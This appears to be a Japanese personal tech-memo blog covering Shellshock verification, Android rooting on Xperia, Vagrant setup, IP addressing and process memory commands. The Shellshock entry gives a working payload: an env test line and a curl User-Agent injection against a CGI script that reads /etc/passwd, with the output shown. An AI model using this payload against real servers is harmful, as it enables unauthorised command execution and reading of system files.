shell shock 検証1
検証環境
OS:ubuntu 12.04
手順
1.脆弱性検証コマンド
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
2.結果
vulnerable this is a test
参考:
第4回 わずか1週間程度でBashが大幅な進化を遂げた ~Shellshock大暴れ~:インフラセキュリティの処方箋|gihyo.jp … 技術評論社
HTTP経由での実行
1. cgi作成
#!/bin/bash echo 'Content-Type:text/html <html> <head> <title>Hello World!</title> </head> <body>Hello World!!!</body> </html>
2.検証コマンド
curl -A "() { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/passwd" http://localhost/cgi-bin/test.cgi
3.結果確認
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh ・ ・
Android root化 備忘
手順
1.adbコマンド実行環境を設定
参照:Windows 8.1でadbコマンドを使えるようにする簡単な方法を紹介
1-1.jdk をインストール
1-2.android DL : Android Studio
※ 画面の下のほうにSDK Tools Only のzipがあるが、platform-toolsが入っていないためこちらを選ぶ
2. adbドライバをインストール設定
android をPCに接続し、Sony PC Companionをインストール
※USBでのPC接続では、ケーブルによって充電しかできないものがある
2-2 .PC側『デバイスとドライブ』に 【Sony PC Software】が表示されるので、クリックし実行
※もしくは『ドライバをインストールしています』と表示され自動実行
インストール完了すると、自動的に起動する。起動確認後に、マシンリブート。
参照:http://www.teradas.net/archives/9931/
2-3. Windowsの『ドライバー署名の強制』を無効化にする
「電源オプション」をクリック > Shift + 再起動をクリック > [トラブルシューティング] >[詳細オプション] >[Windowsのスタートアップ設定] >[再起動] 起動後、「7」を押して「ドライバー署名の強制を無効にする」
※Windows起動後、デバイスマネージャから「Sony sa0106」 > [ADB Inter FaceDriver]を確認
2-4. コマンドプロンプトでadbが実行できることを確認する
参照:
3. tft をDL
SO-01E 9.1.C.1.103,186 のFTFを準備
参照:Xperia FTF
4.Flashtool インストール
参照:【XPERIA】Flashtoolの使い方 - NAVER まとめ
※インストール項目だけでなく、次ページ以降の使い方も参考になる
Vagrant と VirtualBox 備忘
手順
1.VirtualBox をDL&インストール
3.VM 用フォルダ作成
mkdir test cd test
4.VagrantFile作成
でVagrantFileを作成
initの引数にロードするVagrantFileを指定できる(指定しない場合は自分で内容を設定することになる)
vagrant init ubuntu/trusty64
Getting Started - Vagrant Documentation
仮想環境構築ツール「Vagrant」で開発環境を仮想マシン上に自動作成する 2ページ | OSDN Magazine
Discover Vagrant Boxes | Atlas by HashiCorp
IPアドレス割り当て 備忘録
IPアドレス
IP アドレス |
---|
IPアドレスは32bit(8bit4つ)で表現される。 xxxxxxxx.xxxxxxxx.xxxxxxxx.xxxxxxx ↑左から『ネットワーク・アドレス』と『ホスト・アドレス』にわけ、ネットワークの分類とネットワーク内ホストを一度に表現している |
ネットマスク(サブネットマスク)
ネットマスク | IPアドレスからネットワークアドレスを抽出するための値 IPアドレスと同じ32bitで表現され、ネットワークアドレスとみなす部分はすべて1として表す。これはAND演算を行うためである |
---|---|
抽出方法 | AND演算によりIPアドレスからネットワークアドレスを抽出 (255.255.255.0の場合) IPアドレス :11000000.10101000.00000001.10000000 ネットマスク:11111111.11111111.11111111.00000000 AND演算は共に1の場合のみ1として返すため、足し合わせると左側のマスク部分のみが抽出される |
一覧
名前 | 説明 | 例 |
---|---|---|
ネットワークアドレス | LANなどで繋がったネットワーク全体を表すアドレス ホスト部分は全て0bitで表す |
192.168.10.0(ネットワークアドレスは192.168.10) 172.16.0.0 (ネットワークアドレス) |
ブロードキャストアドレス | ネットワークに属するホスト全てを指定する際のアドレス ホスト部分は全て1bitで表す |
192.168.10.255 255 = 1111(2bit表記) |
ループバックアドレス | 127.0.0.1のこと 自分自身を表す |
127.0.0.1 (ホスト名:localhost) |
グローバルアドレス | インターネットで割り当てられたアドレス | いろいろ |
プライベートアドレス | ネットワーク内で割り当てられたアドレス | 192.168.10.20 |
サブネットマスク
アドレスの上位何bitがネットワークアドレスであるかを定義する32bit数値
アドレスの後に/をつけて表す
ex | 192.160.10.255/24 | 上位24bitがネットワークアドレス |
参考
- IPアドレス - ネットワークアドレスとブロードキャストアドレス
- サブネットマスクとは|ネットマスク|subnet mask - 意味/解説/説明/定義 : IT用語辞典
- 基礎から学ぶWindowsネットワーク:第7回 IPアドレスとネットマスク (3/3) - @IT
- 基礎から学ぶWindowsネットワーク:第8回 アドレス・クラスとさまざまなIPアドレス (1/3) - @IT

- 作者: IPUSIRON
- 出版社/メーカー: データ・ハウス
- 発売日: 2015/01/23
- メディア: 単行本(ソフトカバー)
- この商品を含むブログ (1件) を見る
プロセスのメモリ確認 備忘
コマンド
ps
:プロセス情報
ps aux a:sオプションと使用することで全てのプロセスを表示 u:ユーザー名
pmap
: プロセス毎のメモリマップ情報
pmap -x [PID] x:拡張モード
top
: システム利用状況
top